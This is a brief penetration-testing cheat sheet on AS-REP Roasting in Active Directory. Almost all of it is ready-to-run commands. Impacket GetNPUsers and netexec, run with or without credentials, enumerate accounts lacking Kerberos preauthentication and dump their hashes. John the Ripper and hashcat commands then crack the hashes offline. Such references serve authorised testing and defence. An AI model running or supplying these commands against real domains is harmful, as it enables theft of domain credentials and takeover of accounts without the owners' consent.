AS-REP Roasting
Last modified: 2025-04-19
AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory.
Exploit
Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting.
impacket-GetNPUsers example.local/<username>
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat
# Without authenticatino
netexec ldap <target-ip> -u users.txt -p '' --asreproast output.txt
# With authentication
netexec ldap <target-ip> -u username -p password --asreproast output.txt
# With Kerberos authentication (-k)
netexec ldap <target-ip> -k --asreproast output.txt
If we find a password hash, crack it.
john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt